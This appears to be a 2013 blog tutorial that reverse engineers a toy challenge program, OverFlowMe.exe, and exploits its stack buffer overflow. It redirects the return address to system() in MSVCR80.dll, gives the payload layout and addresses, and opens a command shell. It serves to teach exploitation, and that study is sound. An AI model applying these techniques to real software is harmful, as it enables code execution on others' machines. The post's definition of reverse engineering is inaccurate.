
June 26, 2013

Stack Buffer Overflow Reverse engineering: OverFlowMe.exe

Hello again and welcome to my blog. I've recently encountered a very nice riddle hitting BoF and RE fans at the same time. This overwhelming riddle takes the trainee another step out of the box, testing he’s capabilities in understanding how to Reverse Engineer a program and maliciously execute a Buffer Overflow exploit. Stay tuned :P
Let’s take a look at the simple executable:

What this innocent file does is legitimately asking a question, waiting for the user to enter reply with his name.
Entering a name will save the string in the stack as a local variable and recall it to the command line as text.

**That’s the right time to say that if you don’t know what RE or BoF is, it will be best if you research a bit about the two and come back when you’re better prepared.
Long story short, RE is of course Reverse-Engineering, the art of crafting a program in a way that a malicious user or a programmer could inject malicious input or extend its functionality respectively. Extending functionality can of course at the same time be to exploit the program to things it’s not supposed to do.

BoF is a short for an vulnerability called – Buffer Overflow. This "bug" is characterized by an injection of malicious string into a program, forcing it to “step out” of its allocated buffer in order to rewrite memory variables and saved areas in a way that will cause a failure or a malicious script to execute.
There are multiple ways to exploit this vulnerability. We’ll be focusing on Stack BoF.
Here’s the deal:

From left to right – Let’s say I wrote a code saying I would like to create a char c[12] array, and initialize it to “hello”;. The stack will look something like the second image.
If you’ll notice the green and red areas – those are the saved areas for the Frame Pointer and the Return Address. Those two are very important, making sure we know where we are on the stack and where to return to.
In my code I've also created a function that rewrites this variable, but I didn't add any restrictions on how to write to this variable. This mistake was expensive, causing a main() loop in the size of 200 ‘A’s to rewrite my stack variable (see image 3) and exceed the buffer, also rewriting the Frame Pointer and the Return Address. When my function will reach its retrun; command it will use the Return Address from the stack which has 0x41414141 (AAAA) in it. This address is of course not mapped and will cause an Access Violation. Windows crashes the application because the lack of an Exception Handler.

Now let’s take a minute to think what would of happened if a malicious user could exploit this vulnerability and create a BoF in that program. Well yeah, the program than crashed, Hacker is happy, but what else?
You’re right, if an attacker can overwrite the Return Address to some REAL address in the Address Space, she can call a malicious code to be executed from the stack. This is exactly what we are about to do!

First thing first, we need to use a disassembler to virtually build the stack and see what exactly do we need in order to exploit this executable.

**I’m using IDA pro (free version) and OllyDBG (IDA is static analysis while Olly can analyze in run-time)

Here is our executable in the static code analysis tool. If we look at the “View-A” window we can see our binary file laid out, row by row, even though it says nothing about how it will be organized in the stack.
On the left of that window we can see the .text representation : [address].
Starting from the first line: EBP is of course our Base Pointer being initialize and mov (move) sets the Stack Pointer in its place (the top of the stack, cause its empty). Then a subtract of 40h (Hex) is being allocated on the stack and the Source Identifier is being pushed to mark the start of a code section.
Then comes the printf() function and its content (mov, push, call). User then inputs a var_40+ebp content into register ‘A’ (eax) and the push stores it in the stack. After this action, the program automatically calls gets() function with the offset of “Hello” and calls (prints) the data stored in var_40+ebp, which is of course the user’s input and prints the rest of the sentence.
Now we know our Stack looks as followed:

40 Hex stack variables
4 Dec – Frame Pointer
4 Dec – Return Address

What I would like to do is to overwrite the whole stack. The problem is that if I’ll do that, the stack will have no Return Address and then I won’t be able to execute my malicious code. To solve this issue I’ll need to create a new/custom Frame Pointer and Return Address so the program will logically run with no errors, keeping the stack in a correct structure.
Here is what I’m about to do:
40 Hex stack variables
4 Dec – Frame Pointer
4 Dec – Return Address
My Frame Pointer
My Return Address

Now that I know what I want to do I need to calculate exactly how much garbage I would like to inject into the program in order to get it to write the new Return Address in the right place. Once I got there, the second step will be to pour an address into my Return Address, which will instantly take me to my malicious code.

Oppsss… wait a second. Take a look at the program again:

Scrolling down the Strings window we can see that the file uses a DLL called MSVCR80.dll which maybe indicates that the program is using this DLL. Looking at the DependencyWalker (next screenshot) we can confirm our suspicion. (next to the red '1').

Let’s check Google for this file’s capabilities, so maybe we can spare calling a malicious DLL, and leverage the attack by calling some function from a legitimate DLL the program uses.

Looking quickly into Google I found that - ”msvcr80.dll is a module associated with Microsoft Visual Studio 2005 from Microsoft Corporation. It is the Microsoft C Runtime Library and is used by programs written with Microsoft Visual Studio 2005.

Conclusions is that maybe this DLL has system() or _execv() capabilities. Using DependencyWalker we would try and find the base address this DLL loads from and find the relative offset of this functions. Here is what I found:

The DLL loads from 0x78130000 and the offset to the system() function is 0x003009B, means we need to add the one to the other using a Hex calculator:
Go to calc.exe (startàrunàcalc) and View as Programmer (Alt+3). Switch Decimal to Hex in the upper left wing of the calculator and simply input the two addresses:

Now we know that in order to call the system() we need to create an overflow in the stack, build some random (4 decimal) Frame Pointer that we won’t be even using so we don’t care about its content and concatenate in with the address to the loaded function, exactly as we calculated right now.
But wait, don’t we missing something? Let’s see again:
      1)      Overflow the program – check!
      2)      Create a new Frame Pointer and Return Address to keep stack logic structure – check!
      3)      Pour into the Return Address our call for the system() function from its original address – check!
Ohh… we’re missing the system()’s argument!

Now we need to find a way to create a pointer to the place where we put our argument. The argument for this example will be “start cmd”, which will open a new Command Line window, waiting for you to maliciously take over the machine.
Keep a close eye because that’s a tricky one. Here’s how the stack should look like:

     Stack abstract            Stack input
40 Hex stack variables
4 Dec – Frame Pointer
4 Dec – Return Address
My Frame Pointer
My Return Address
Pointer to command address
malicious command

78 16 00 9B
Some pointer
“start cmd”

**Notice that when we’re injecting addresses we’re using “Little Endian”, which basically says we need to write the address backwards, but keep the Hex. Example: 00 B7 78 16 à 16 78 B7 00

To get the pointer we cannot use IDA pro, because IDA, as we said earlier, is a static binary analysis. If we like to dynamically analyze the code we need a tool that can make this magic happened.
OllyDBG is exactly what we need (you can also use Immunity Debugger or alike).
Why do we need to analyze the program in run-time?
The thing is that we want to know the address of our new code, which will only be created after we run the program and input our string.

Here is the next procedure:

Now we would like to execute the file, input the string that causes the overflow and calculate exactly where the call to system() should end.
Starting the program we can see the binary, and by holding the step over button (F8), until it automatically stops, we get to the following address – 00 18 FF 4C:

This address is of course the location where the user supposed to insert his input. If we’ll look at the Command Line prompt we should see:

Now we have everything we need but a comfortable editor to write our exploit in.
I recommend a nice editor called HxD, but you can also use Hex Editor Neo and others.
Our exploit should look as following:

40Hex (stack variables) + 10Hex (4 Dec Frame Pointer + 4 Dec Return Add + 4 Dec New FP) + MSVCR80.DLL address (system() location) + 4Hex pointer + system command (start cmd)

This how it looks in the HxD:

**Notice that addresses are supposed to be written in the Hex (left) side while ASCII are being written in the Decimal side (right).

Let’s save this file as exploit.dat and do the following:
      1)      Open Command Line
      2)      Go to overFlowMe.exe location
      3)      Run the following command: overFlowMe.exe < c:\filepath\exploit.dat
a.       This command will execute the .exe file and when user-input call initiates, the exploit content will be poured into the gets() location, exploiting the program.
 But wait… we got an error:

Why is that?! We did everything as it supposed to be…
Do you have any idea?
Well I’ve encountered this error and after a quick brain storming with myself I understood that it has to be one of the three options:
      1)      Something is wrong in the overflow
a.       Countermeasure – calculated everything again. It went out exactly the same.
      2)      Something is wrong with the return address – could be.
      3)      Something is wrong with the pointer – couldn't be. If it was a pointer issue the error was different. Trust me on that for now.

Eliminating (1) and (3), I started checking whether the address is wrong. A quick consultation with a friend got me to a very interesting solution. My friend told me that the DependencyWalker only displays a preferred address and that I better double check it in the OllyDBG and so I did.

Here is what I did:
      1)      Open Olly and click on the ‘M’ (Memory) button.
      2)      A window will open, with an organized table containing everything you need to know about your stack memory.
      3)      Look for your DLL under the “owner” column and check what address it is load from.
      4)      In the following image we can see that MSVCR80.DLL PE header is being load from – 74 B0 00 00

Now let’s correct our exploit:
74 B0 00 00 + 00 03 00 9B = 74 B3 00 9B
** 00 03 00 9B is the offset to system()  remember?

Let’s rerun overFlowMe.exe < c:\filepath\exploit.dat

Again an error!
Well now the error is very clear. The pointer is wrong, and the system() gets a command it does not understand. It is equal to – c:\>wrong windows command
Error: “‘wrong’ is not recognized as an internal or external command…”

What is missing?
If we look at the error we see that system() tried to execute a code from our exploit only it executed too early in the code.
Going back to Olly and double clicking the address column on the bottom right table we see that we are in the wrong offset by 8. Double clicking again to go back to the addresses represented by ‘==>’ will probably show us the right address that will execute the right code section.

The address near ‘==>’ is 00 18 FF 54
**don’t forget “Little Endian”
Let’s rewrite the exploit again and see if that fixed our error.

Executing the .exe again with our exploits gives us the following:

Viola! We got it. Our exploit worked!
We managed to create a Buffer Overflow, rebuild the stack and execute system(“start cmd”);

Hope you've enjoyed (:

